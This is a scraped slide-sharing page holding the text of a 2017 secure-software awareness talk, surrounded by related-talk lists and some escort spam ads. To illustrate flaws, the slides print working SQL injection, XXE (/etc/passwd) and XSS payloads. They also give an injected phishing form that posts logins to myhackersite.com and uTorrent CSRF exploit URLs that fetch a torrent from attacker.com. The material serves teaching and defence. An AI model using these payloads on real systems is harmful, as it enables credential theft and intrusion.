XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in Grailstheratpack
 
KeyLoggers - beating the shit out of keyboard since quite a long time
KeyLoggers - beating the shit out of keyboard since quite a long timeKeyLoggers - beating the shit out of keyboard since quite a long time
KeyLoggers - beating the shit out of keyboard since quite a long timen|u - The Open Security Community
 
Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Priyanka Aash
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfGiorgiRcheulishvili
 
Protect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesProtect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesLeo Loobeek
 
Information security & ethical hacking
Information security & ethical hackingInformation security & ethical hacking
Information security & ethical hackingeiti panchkula
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 

Similar a Secure Software: Action, Comedy or Drama? (2017 edition) (20)

JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложение
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложениеJS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложение
JS Fest 2019. Виктор Турский. 6 способов взломать твое JavaScript приложение
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
[DevDay2018] Securing the Web - By Sumanth Damarla, Tech Speaker at Mozilla
[DevDay2018] Securing the Web - By Sumanth Damarla, Tech Speaker at Mozilla[DevDay2018] Securing the Web - By Sumanth Damarla, Tech Speaker at Mozilla
[DevDay2018] Securing the Web - By Sumanth Damarla, Tech Speaker at Mozilla
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018
 
Cryptography - You're doing it wrong! (Attila Balazs)
Cryptography - You're doing it wrong! (Attila Balazs)Cryptography - You're doing it wrong! (Attila Balazs)
Cryptography - You're doing it wrong! (Attila Balazs)
 
Static Code Analysis PHP[tek] 2023
Static Code Analysis PHP[tek] 2023Static Code Analysis PHP[tek] 2023
Static Code Analysis PHP[tek] 2023
 
6 ways to hack your JavaScript application by Viktor Turskyi
6 ways to hack your JavaScript application by Viktor Turskyi 6 ways to hack your JavaScript application by Viktor Turskyi
6 ways to hack your JavaScript application by Viktor Turskyi
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.ppt
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.ppt
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.ppt
 
XSS Countermeasures in Grails
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in Grails
 
XSS Countermeasures in Grails
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in Grails
 
XSS Countermeasures in Grails
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in Grails
 
KeyLoggers - beating the shit out of keyboard since quite a long time
KeyLoggers - beating the shit out of keyboard since quite a long timeKeyLoggers - beating the shit out of keyboard since quite a long time
KeyLoggers - beating the shit out of keyboard since quite a long time
 
Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
Protect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesProtect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying Techniques
 
Information security & ethical hacking
Information security & ethical hackingInformation security & ethical hacking
Information security & ethical hacking
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
Basic malware analysis
Basic malware analysis Basic malware analysis
Basic malware analysis
 

Más de Peter Sabev

Burnout - синдром на професионалното изчерпване
Burnout - синдром на професионалното изчерпванеBurnout - синдром на професионалното изчерпване
Burnout - синдром на професионалното изчерпванеPeter Sabev
 
Usability Testing за нула време, с нула пари и нула опит
Usability Testing за нула време, с нула пари и нула опитUsability Testing за нула време, с нула пари и нула опит
Usability Testing за нула време, с нула пари и нула опитPeter Sabev
 
Ако можех да се клонирам... Можеш! Делегирай!
Ако можех да се клонирам... Можеш! Делегирай!Ако можех да се клонирам... Можеш! Делегирай!
Ако можех да се клонирам... Можеш! Делегирай!Peter Sabev
 
Reporting bugs: Errors Made and Lessons Learned
Reporting bugs: Errors Made and Lessons LearnedReporting bugs: Errors Made and Lessons Learned
Reporting bugs: Errors Made and Lessons LearnedPeter Sabev
 
Петър Събев - Как да работим с англичани
Петър Събев - Как да работим с англичаниПетър Събев - Как да работим с англичани
Петър Събев - Как да работим с англичаниPeter Sabev
 
Veselin Berov - Testing in the World of Information Management
Veselin Berov - Testing in the World of Information ManagementVeselin Berov - Testing in the World of Information Management
Veselin Berov - Testing in the World of Information ManagementPeter Sabev
 
Slavy Slavov - 6 Common Challenges Setting Up Selenium in High Scale
Slavy Slavov - 6 Common Challenges Setting Up Selenium in High ScaleSlavy Slavov - 6 Common Challenges Setting Up Selenium in High Scale
Slavy Slavov - 6 Common Challenges Setting Up Selenium in High ScalePeter Sabev
 
Working with UK people (for Bulgarians)
Working with UK people (for Bulgarians)Working with UK people (for Bulgarians)
Working with UK people (for Bulgarians)Peter Sabev
 
10 Useful Testing Tools for Open Source Projects @ TuxCon 2015
10 Useful Testing Tools for Open Source Projects @ TuxCon 201510 Useful Testing Tools for Open Source Projects @ TuxCon 2015
10 Useful Testing Tools for Open Source Projects @ TuxCon 2015Peter Sabev
 
Професия QA инженер - SoftUniConf June 2015
Професия QA инженер - SoftUniConf June 2015Професия QA инженер - SoftUniConf June 2015
Професия QA инженер - SoftUniConf June 2015Peter Sabev
 
RuseConf 2014 - Как да създадем съвършен екип с несъвършени хора
RuseConf 2014 - Как да създадем съвършен екип с несъвършени хораRuseConf 2014 - Как да създадем съвършен екип с несъвършени хора
RuseConf 2014 - Как да създадем съвършен екип с несъвършени хораPeter Sabev
 

Más de Peter Sabev (11)

Burnout - синдром на професионалното изчерпване
Burnout - синдром на професионалното изчерпванеBurnout - синдром на професионалното изчерпване
Burnout - синдром на професионалното изчерпване
 
Usability Testing за нула време, с нула пари и нула опит
Usability Testing за нула време, с нула пари и нула опитUsability Testing за нула време, с нула пари и нула опит
Usability Testing за нула време, с нула пари и нула опит
 
Ако можех да се клонирам... Можеш! Делегирай!
Ако можех да се клонирам... Можеш! Делегирай!Ако можех да се клонирам... Можеш! Делегирай!
Ако можех да се клонирам... Можеш! Делегирай!
 
Reporting bugs: Errors Made and Lessons Learned
Reporting bugs: Errors Made and Lessons LearnedReporting bugs: Errors Made and Lessons Learned
Reporting bugs: Errors Made and Lessons Learned
 
Петър Събев - Как да работим с англичани
Петър Събев - Как да работим с англичаниПетър Събев - Как да работим с англичани
Петър Събев - Как да работим с англичани
 
Veselin Berov - Testing in the World of Information Management
Veselin Berov - Testing in the World of Information ManagementVeselin Berov - Testing in the World of Information Management
Veselin Berov - Testing in the World of Information Management
 
Slavy Slavov - 6 Common Challenges Setting Up Selenium in High Scale
Slavy Slavov - 6 Common Challenges Setting Up Selenium in High ScaleSlavy Slavov - 6 Common Challenges Setting Up Selenium in High Scale
Slavy Slavov - 6 Common Challenges Setting Up Selenium in High Scale
 
Working with UK people (for Bulgarians)
Working with UK people (for Bulgarians)Working with UK people (for Bulgarians)
Working with UK people (for Bulgarians)
 
10 Useful Testing Tools for Open Source Projects @ TuxCon 2015
10 Useful Testing Tools for Open Source Projects @ TuxCon 201510 Useful Testing Tools for Open Source Projects @ TuxCon 2015
10 Useful Testing Tools for Open Source Projects @ TuxCon 2015
 
Професия QA инженер - SoftUniConf June 2015
Професия QA инженер - SoftUniConf June 2015Професия QA инженер - SoftUniConf June 2015
Професия QA инженер - SoftUniConf June 2015
 
RuseConf 2014 - Как да създадем съвършен екип с несъвършени хора
RuseConf 2014 - Как да създадем съвършен екип с несъвършени хораRuseConf 2014 - Как да създадем съвършен екип с несъвършени хора
RuseConf 2014 - Как да създадем съвършен екип с несъвършени хора
 

Último

Active Directory Penetration Testing, cionsystems.com.pdf
Active Directory Penetration Testing, cionsystems.com.pdfActive Directory Penetration Testing, cionsystems.com.pdf
Active Directory Penetration Testing, cionsystems.com.pdfCionsystems
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about usDynamic Netsoft
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...harshavardhanraghave
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 

Último (20)

Active Directory Penetration Testing, cionsystems.com.pdf
Active Directory Penetration Testing, cionsystems.com.pdfActive Directory Penetration Testing, cionsystems.com.pdf
Active Directory Penetration Testing, cionsystems.com.pdf
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software Developers
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about us
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Exploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the ProcessExploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the Process
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 

Secure Software: Action, Comedy or Drama? (2017 edition)

  • 1. Secure Software: Action, Comedy or Drama? (Edition 2017) Peter Sabev, p.sabev@fastlanesoft.com
  • 2.
  • 3. Who is that man? Giotto (1266-1337) Italian painter and architect
  • 4. The Mourning of Christ (1306) in Cappella degli Scrovegni
  • 5. Pope Benedict XI looking for masters…
  • 6. Creating perfect circles and perfect software is hard! Software as coded Intended functionality
  • 7. Intended vs. Implemented Missing or Incorrect Functionality Side-effect: Most security bugs are here!
  • 8. I’ll talk about the side effects today…
  • 9. Sometimes bugs are found accidentally… •Logged on his father XBOX •Without knowing password •Bug with leading spaces in password field
  • 10. Sometimes attacks are on purpose…
  • 11. 2011 Sony PlayStation Network Outage •23 days outage of all Sony PS3 and PSP consoles •77 000 000 user accounts exposed • Over 12 000 credit card numbers stolen • Outage costs were officially $171 000 000
  • 12.
  • 13. Some Facts and Numbers 97% of scanned Java apps in 2015 that had code quality errors 95% of the mobile apps were vulnerable 90% of web apps have security vulnerabilities 87% of PHP application with vulnerable security functions 43% of developers who released apps with known vulnerabilities 39% increase of vulnerabilities in the last 5 years 10% of the applications still have hard-coded passwords Sources: Vulnerability Review 2016-2017, Flexera Software; HPE Cyber Risk Report 2016; 2015 Trustwave Global Security Report; World Quality Report 2015-2016, Capgemini; The Impact of Security on Development, Prevoty
  • 14. OWASP Top 10 Vulnerabilities 2017-RC2 CWE/SANS Top 25 Most Dangerous Software Errors
  • 15. The most important vulnerabilities combined into 5 titles: 1. Insecure Interface 2. Insufficient Authentication 3. Security Misconfiguration 4. Lack of Transport Encryption 5. Privacy Concerns
  • 16. 1. Insecure Interface • Code Injections (SQLi, XXE) • Cross-Site Scripting (XSS) • Cross-Site Request Forgery (CSRF)
  • 17. THIS TALK SHOWS SOME TECHNIQUES FOR DEVELOPING BETTER SOFTWARE SECURITY AND HACKER DEFENSE ATTITUDE. YOU MAY USE THESE TECHNIQUES ON COMPUTERS, WEBSITES, SYSTEMS AND SOFTWARE THAT YOU OWN. PERFORMING HACK ATTEMPTS WITHOUT PERMISSION ON COMPUTERS THAT YOU DO NOT OWN IS ILLEGAL.
  • 18. SQL Injection explained in 3 steps: String sqlQuery = "SELECT * FROM user WHERE name = '" + username +"' AND pass='" + password + "'“ SELECT * FROM user WHERE name = 'Peter' AND pass='' OR '1'='1' 2. Setting username to Peter & password to ' OR '1'= '1 produces: 1. Imagine the following piece of code: 3. '1'='1' is always true, so Peter is logged in without password.
  • 20.
  • 21. Injection does not need to be SQL…
  • 22. It does not need to be front-end either…
  • 23. It can be even in <Injected Malicious Code>
  • 24. It can be even in Problem: • Checked MIME type only • Fixed 8+ times until fully resolved (05/2016) • Vulnerabilities up to now: 403!!! (11/2017) • https://imagetragick.com/
  • 25. Popular vulnerability in 2017: XML External Entity (XXE) Processing <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> 1. Application parses XML documents. 2. The XML processor is configured to validate and process/resolve the document type declaration (DTD):
  • 26. 2. Cross Site Scripting (XSS) explained <script>alert('XSS')</script> Put the following code in search field, editbox or another text component:
  • 27.
  • 28.
  • 29. Funny image or banner ad? <img src="https://i.ytimg.com/vi/0vxCFIGCqnI/maxresdefau lt.jpg" width="80%">
  • 30.
  • 31. Entire login form that tricks the user? This video is Hilarious..... worth every second'<br><br>To see the search results, please login with the form below before proceeding:<form action="http://myhackersite.com/destination.php"><t able><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><inp ut type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form><br/><br/><br/><br/><br/><br/>
  • 32.
  • 33. The link to distribute is a little bit long… http://testasp.vulnweb.com/Search.asp?tfSearch=This%20video%20is%20Hil arious.....%20worth%20every%20second%27%3Cbr%3E%3Cbr%3ETo%20see %20the%20search%20results%2C%20please%20login%20with%20the%20for m%20below%20before%20proceeding%3A%3Cform%20action%3D%22http %3A%2F%2Fmyhackersite.com%2Fdestination.asp%22%3E%3Ctable%3E%3C tr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%3Dte xt%20length%3D20%20name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C tr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type% 3Dtext%20length%3D20%20name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ft r%3E%3C%2Ftable%3E%3Cinput%20type%3Dsubmit%20value%3DLOGIN%3 E%3C%2Fform%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3 E%3Cbr%2F%3E%3Cbr%2F%3E
  • 34. But that is what URL shortening services are for… Here is your phishing URL: http://bit.ly/25zaEyy
  • 36. 3. Cross-Site Request Forgery (CSRF) causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
  • 37. 3 Easy Steps for uTorrent CSRF Exploit (2008) 1. Turn on “Move completed downloads” option: http://localhost:14774/gui/?action=setsetting&s=d ir_completed_download_flag&v=
  • 38. 2. Change the path a completed downloads to Windows startup folder: http://localhost:14774/gui/?action=setsetting&s=d ir_completed_download&v=C:Documents%20and %20SettingsAll%20UsersStart%20MenuProgram sStartup 3 Easy Steps for uTorrent CSRF Exploit (2008)
  • 39. 3 Easy Steps for uTorrent CSRF Exploit (2008) 3. Provide link to torrent containing .bat file and malware software to the end user: http://localhost:14774/gui/?action=add- url&s=http://www.attacker.com/file.torrent
  • 41. The Action Part (XSS&CSRF) X-Frame-Options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block Regenerate cookies after login. Check the IP address (or even contain it in cookies)
  • 42. 1. Trust no user input. Never. Ever! 2. Sanitize input and process only 100% trustworthy data. 3. Use parameterized queries and stored procedures. 4. Test! There are many scanners for SQLi, XSS, CSRF, etc. The Action Part (Summary)
  • 43. Penetration Testing Tools OWASP ZAP (Zed Attack Proxy) Nikto Nmap Acunetix Bishop Vulnerability Scanner (Chrome Plugin) Firebug (Firefox plugin) HP Scrawlr & HP Webinspect Havij Pro Sqlmap
  • 44.
  • 46. 123456 password 12345678 qwerty password Which is the most popular password?
  • 50. • 9.8% have the passwords password, 123456 or 12345678; • 14% have a password from the top 10 passwords • 40% have a password from the top 100 passwords • 79% have a password from the top 500 passwords • 91% have a password from the top 1 000 passwords • 98.8% have a password from the top 10 000 passwords
  • 51. 1. Limit login attempts. 2. Add password length and character requirements. The Action Part
  • 52. … and the “big difference”: The 3 most popular passwords now hold “only” 1,2% of all passwords: •Password1 •Hello123 •Welcome1 Source: TrustWave
  • 53. 1. Limit login attempts. 2. Add password length and character requirements. 3. Password encryption The Action Part
  • 54. The Worst Option: Unencrypted Password <server> <id>my.server</id> <username>admin</username> <password>Welcome1</password> </server>
  • 55. Still Bad Option: Shift ASCII Code or Similar* <server> <id>my.server</id> <username>admin</username> <password>Zhofrph4</password> </server> * There was a hot dispute in developer’s forum whether shift by 5 or shift by 12 is better
  • 56. Better Option: Use MD5 hash (with salt!!!) <server> <id>my.server</id> <username>admin</username> <password>{b56e0b4ea4962283bee762525c2d4 90f}</password> </server>
  • 57. Even better option - Bcrypt <server> <id>my.server</id> <username>admin</username> <password>{$2a$08$zr8EtKWwENQBAztAp3o0FO 5Tbc69RuJrm6GvPhJKOZr/PNkaZKxE2}</passwo rd> </server>
  • 58. 1. Limit login attempts. 2. Add password length and character requirements. 3. Password encryption 4. Password recovery The Action Part
  • 61. 1. Limit login attempts. 2. Add password length and character requirements. 3. Password encryption 4. Password recovery 5. Protect against non-human intervention (captcha) The Action Part
  • 64. Slack’s DB got stolen and hacked (05’2015)
  • 65. LinkedIn got hacked (2012) •164 million accounts stolen •Account info sold now on black market •Check haveibeenpwned.com for your account  •There are concerns even for the current fixes
  • 66. The Problem: One-Factor Authentication Something that you know
  • 67. Two-Factor Authentication: Something that you know + Something that you have
  • 68. Three-Factor Authentication: Something that you know + Something that you have + Something that you are
  • 69. Use two or three factor authentication (at least for important stuff) The Real Action Part
  • 70.
  • 71. Distributed Denial of Service (DDoS) • TV Show (10000s people visit your site) • Early days: ICQ • Nowadays: Malware Victim Daemon Daemon Daemon Daemon Daemon Master Real Attacker
  • 72. 1. Invest in hardware The Action Part
  • 73. Worse than DDoS: Ransomware •Biggest problem of 2016 and 2017 •Usually encrypts the files so they become unusable •Wants money to be paid (usually in untrackable BTC)
  • 74. 1. Invest in hardware 2. Backup and Recovery Plans The Action Part
  • 75.
  • 76. 1. Invest in hardware 2. Backup and Recovery Plans 3. Prevent flooding The Action Part
  • 77. Access Control Removing any site from Google using URL manipulation? •Exploit in Google Webmaster Tools •Fixed within 7 hours https://www.google.com/webmasters/tools/removals- request?hl=en&siteUrl=http:// {YOUR_URL} /&urlt= {URL_TO_BLOCK} 77 Source: http://www.jamesbreckenridge.co.uk/remove-any-site-from-google-even-if-you-dont-control-it.html
  • 78. 1. Invest in hardware 2. Backup and Recovery Plans 3. Prevent flooding 4. Use Access Control Lists 5. Secure configuration, Logging and Monitoring The Action Part
  • 79. Google is not Google? (2012, Brazil) •Biggest ISP in Brazil •Firmware vulnerability •4.5 million routers •Malicious DNS servers •Fake Google.com, Facebook.com, Yahoo.com and others install malware
  • 80. 6. Minimum open ports and running services The Action Part
  • 81. There is no escape sometimes!
  • 82. Source: Vulnerability Review 2017, Flexera Software Most Vulnerable Products 2017
  • 83. 0 100 200 300 400 500 600 700 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014 2015 Known vulnerabilities per year by OS in the last 10 years Windows MacOS Ubuntu (incl. kernel) Debian (incl. kernel)
  • 84.
  • 85. 6. Minimum open ports and running services 7. Frequent update of firmware and software 8. Secure updates – use checksums to avoid downloading fake update The Action Part
  • 87.
  • 88. Example 2: Baby-Phone •IoT can be dangerous •Wi-Fi sniffing is possible •Strangers near your house?
  • 90. 6. Minimum open ports and running services, use firewall 7. Frequent update of firmware and software 8. Secure updates – use checksums to avoid downloading fake update 9. Improve physical security The Action Part
  • 91.
  • 93. A Story of How I Won an Online Game
  • 94. Non-Encrypted POST query: POST /path/script.cgi HTTP/1.0 From: game@*site*.com User-Agent: HTTPTool/1.0 Content- Type: application/x-www-form-urlencoded Content- Length: 33 name=Peter&surname=Sabev&score=10 POST /path/script.cgi HTTP/1.0 From: game@*site*.com User-Agent: HTTPTool/1.0 Content- Type: application/x-www-form-urlencoded Content- Length: 36 name=Peter&surname=Sabev&score=32767 My “next game” was with the following POST query: When I finished the game, the following HTTP POST query was sent:
  • 95.
  • 98. Jeep Cherokee remotely controlled •Uconnect radio breach •Anyone can control your car •Just need to know car’s IP address •Chrysler recalls 1 400 000 vehicles
  • 99. Plane hacked mid-air (05’2015) •Just using laptop and LAN cable •Entertainment System connected to the Cabin Control System •Default credentials •Caused plane to climb in simulated flight
  • 101. Use recommended, accepted and up to date implementation and follow the best encryption and authentication practices. The Action Part
  • 102. Compare left and right… Facebook.com Google.com Yahoo.com Booking.com Facebook.com Google.com Yahoo.com Booking.com
  • 103. The letters in red are Cyrillic (IDN attack) Facebook.com Google.com Yahoo.com Booking.com Facebook.com Google.com Yahoo.com Booking.com
  • 104. Obtain EV certificate & use 2FA Issue was resolved for browsers in April 2017, still a problem for emails and links in social networks. The Action Part
  • 105.
  • 106. London HIV Clinic •Sent emails with addresses using “To:” instead of “Bcc:” • 730 of the 781 patients contained people's full names •Fined £180,000
  • 107. App needs access? •Pictures? Videos? Files? •Calls info? Device ID? •Wi-Fi networks? Friday 17 June 15.00: Italy - Sweden 18.00: Czech Republic - Croatia 21.00: Spain - Turkey
